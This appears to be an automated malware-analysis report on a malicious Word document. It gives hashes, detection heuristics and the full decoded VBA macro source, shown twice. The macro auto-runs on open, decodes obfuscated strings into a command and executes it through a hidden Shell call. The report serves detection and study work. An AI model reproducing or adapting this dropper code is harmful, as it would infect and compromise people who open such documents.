Office (OLE) malware analysis — malicious · fa42efcc6fdaafe2

MALICIOUS

Office (OLE)

55.5 KB Created: 2018-09-05 08:52:00 Authoring application: Microsoft Office Word First seen: 2020-05-14

MD5: 54b6d7cd8137b1d76ee21be9cf81a480 SHA-1: 5b25c5eb76840a8d703d399f767bad0f27a4f168 SHA-256: fa42efcc6fdaafe251de452d806503b6c21fa6e8f5696f9ea23afe9bfb215623

170 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Agent-7076698-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7076698-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell tstr, 0
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4125 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4125 bytes
SHA-256: `6440873221e5ccaae457e63695a1620844183edf0b67e6b5157029cc090685c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() priv = "private" nikiuragaz priv End Sub Attribute VB_Name = "nickwesley" Function functionget(str2) titleform1 = between(str2) titleform.TextName = titleform1 End Function Attribute VB_Name = "titleform" Attribute VB_Base = "0{AEAEC067-F5C6-4729-A1F9-412C93F5CD03}{A7B101D4-71D7-4BE0-AE1D-AEC887DD06DF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox2_Change() tstr = titleform.TextBox2 Shell tstr, 0 End Sub Private Sub TextBox3_Change() functionset End Sub Attribute VB_Name = "penlvn10" Function vokhsabuz(concludeconclude) Select Case concludeconclude Case 1 vokhsabuz = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9" Case 2 vokhsabuz = "\-xfdj$b%9_" Case 3 vokhsabuz = ";\|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_" Case 4 vokhsabuz = "1,,5f{l52" Case 5 vokhsabuz = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52" Case 6 vokhsabuz = " s(s,,3:fdg\|" Case 7 vokhsabuz = "\,,nffl8}}/z""z{szvkkcx bd}xhlsfds kdzh,,;:)zf)n\|" Case 8 vokhsabuz = "\,,nffl8}}xfzd[czfz )k{}xhlsfds kdzh,,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52" Case 9 vokhsabuz = " ]zf39xfzdf4ldk)sxx9,5f{l52" End Select If InStr(concludeconclude, "FJ") Then vokhsabuz = " ]zf,94aj$ckaxfg""s9njccs$." End If End Function Attribute VB_Name = "put_line" Function between(file) bulk = "" repheader = 1 pause repheader, bulk, file between = bulk End Function Function pause(ByRef by, ByRef integer1, union) constant = Len(union) If by <= constant Then integer1 = integer1 + repfooter(enable(Mid(union, by, 1)), 9) by = by + 1 pause by, integer1, union End If End Function Function repfooter(minute, naturaln) If minute - naturaln < 1 Then repfooter = Right(Left(titleform.TextBox1, Len(titleform.TextBox1) + minute - naturaln), 1) Else repfooter = Right(Left(titleform.TextBox1, minute - naturaln), 1) End If End Function Function enable(return1) Space1 = 1 day1 = 1 validate Space1, day1, return1 enable = day1 End Function Function validate(ByRef Space1, ByRef day1, return1) asc1 = titleform.TextBox1 constant = Len(asc1) If by < constant Then element = Right(Left(asc1, Space1), 1) If return1 <> element Then Space1 = Space1 + 1 validate Space1, day1, return1 Else day1 = Space1 End If End If End Function Attribute VB_Name = "starcars" Function januaryagp(ByRef profdoogie, heutemor, ayakceleT) profdoogie = profdoogie + heutemor + ayakceleT End Function Function limetrai() limetrai = "1" End Function Function nikiuragaz(ByRef clancy4567) titleform.TextBox3 = clancy4567 day1 = 30 End Function Attribute VB_Name = "testmodule" Function functionset() kingwilbur = "chaitra2" screwrho = "vonaherT" brascule = "klerscor" huang333 = "owernice38" sutclase = "" functionget (vokhsabuz(1)) januaryagp sutclase, titleform.TextName, kingwilbur functionget (vokhsabuz(2)) januaryagp sutclase, titleform.TextName, screwrho functionget (vokhsabuz(3)) januaryagp sutclase, titleform.TextName, screwrho functionget (vokhsabuz(4)) januaryagp sutclase, titleform.TextName, brascule functionget (vokhsabuz(5)) januaryagp sutclase, titleform.TextName, brascule functionget (vokhsabuz(6)) januaryagp sutclase, titleform.TextName, kingwilbur functionget (vokhsabuz(7)) januaryagp sutclase, titleform.TextName, kingwilbur functionget (vokhsabuz(8)) januaryagp sutclase, titleform.TextName, huang333 functionget (vokhsabuz(9)) januaryagp sutclase, titleform.TextName, huang333 functionget (vokhsabuz("FJK")) januaryagp sutclase, titleform.TextName, "" titleform.TextBox2 = sutclase End Function

SHA-256: 6440873221e5ccaae457e63695a1620844183edf0b67e6b5157029cc090685c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
priv = "private"
nikiuragaz priv
End Sub

Attribute VB_Name = "nickwesley"
Function functionget(str2)
titleform1 = between(str2)
titleform.TextName = titleform1
End Function

Attribute VB_Name = "titleform"
Attribute VB_Base = "0{AEAEC067-F5C6-4729-A1F9-412C93F5CD03}{A7B101D4-71D7-4BE0-AE1D-AEC887DD06DF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox2_Change()
tstr = titleform.TextBox2
Shell tstr, 0
End Sub

Private Sub TextBox3_Change()
functionset
End Sub

Attribute VB_Name = "penlvn10"
Function vokhsabuz(concludeconclude)
Select Case concludeconclude
Case 1
vokhsabuz = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9"
Case 2
vokhsabuz = "\-xfdj$b%9_"
Case 3
vokhsabuz = ";|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_"
Case 4
vokhsabuz = "1,,5f{l52"
Case 5
vokhsabuz = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52"
Case 6
vokhsabuz = " s(s,,3:fdg|"
Case 7
vokhsabuz = "\,,nffl8}}/z""z{szvkkcx bd}xhlsfds kdzh,,;:)zf)n|"
Case 8
vokhsabuz = "\,,nffl8}}xfzd[czfz )k{}xhlsfds kdzh,,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52"
Case 9
vokhsabuz = " ]zf39xfzdf4ldk)sxx9,5f{l52"
End Select
If InStr(concludeconclude, "FJ") Then
vokhsabuz = " ]zf,94aj$ckaxfg""s9njccs$."
End If
End Function

Attribute VB_Name = "put_line"
Function between(file)
bulk = ""
repheader = 1
pause repheader, bulk, file
between = bulk
End Function

Function pause(ByRef by, ByRef integer1, union)
constant = Len(union)
If by <= constant Then
integer1 = integer1 + repfooter(enable(Mid(union, by, 1)), 9)
by = by + 1
pause by, integer1, union
End If
End Function

Function repfooter(minute, naturaln)
If minute - naturaln < 1 Then
repfooter = Right(Left(titleform.TextBox1, Len(titleform.TextBox1) + minute - naturaln), 1)
Else
repfooter = Right(Left(titleform.TextBox1, minute - naturaln), 1)
End If
End Function

Function enable(return1)
Space1 = 1
day1 = 1
validate Space1, day1, return1
enable = day1
End Function
  
Function validate(ByRef Space1, ByRef day1, return1)
asc1 = titleform.TextBox1
constant = Len(asc1)
If by < constant Then
    element = Right(Left(asc1, Space1), 1)
    If return1 <> element Then
    Space1 = Space1 + 1
    validate Space1, day1, return1
    Else
    day1 = Space1
    End If
End If
End Function

Attribute VB_Name = "starcars"
Function januaryagp(ByRef profdoogie, heutemor, ayakceleT)
profdoogie = profdoogie + heutemor + ayakceleT
End Function

Function limetrai()
limetrai = "1"
End Function

Function nikiuragaz(ByRef clancy4567)
titleform.TextBox3 = clancy4567
day1 = 30
End Function

Attribute VB_Name = "testmodule"
Function functionset()
kingwilbur = "chaitra2"
screwrho = "vonaherT"
brascule = "klerscor"
huang333 = "owernice38"

sutclase = ""

functionget (vokhsabuz(1))
januaryagp sutclase, titleform.TextName, kingwilbur
functionget (vokhsabuz(2))
januaryagp sutclase, titleform.TextName, screwrho
functionget (vokhsabuz(3))
januaryagp sutclase, titleform.TextName, screwrho
functionget (vokhsabuz(4))
januaryagp sutclase, titleform.TextName, brascule
functionget (vokhsabuz(5))
januaryagp sutclase, titleform.TextName, brascule
functionget (vokhsabuz(6))
januaryagp sutclase, titleform.TextName, kingwilbur
functionget (vokhsabuz(7))
januaryagp sutclase, titleform.TextName, kingwilbur
functionget (vokhsabuz(8))
januaryagp sutclase, titleform.TextName, huang333
functionget (vokhsabuz(9))
januaryagp sutclase, titleform.TextName, huang333
functionget (vokhsabuz("FJK"))
januaryagp sutclase, titleform.TextName, ""

titleform.TextBox2 = sutclase
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.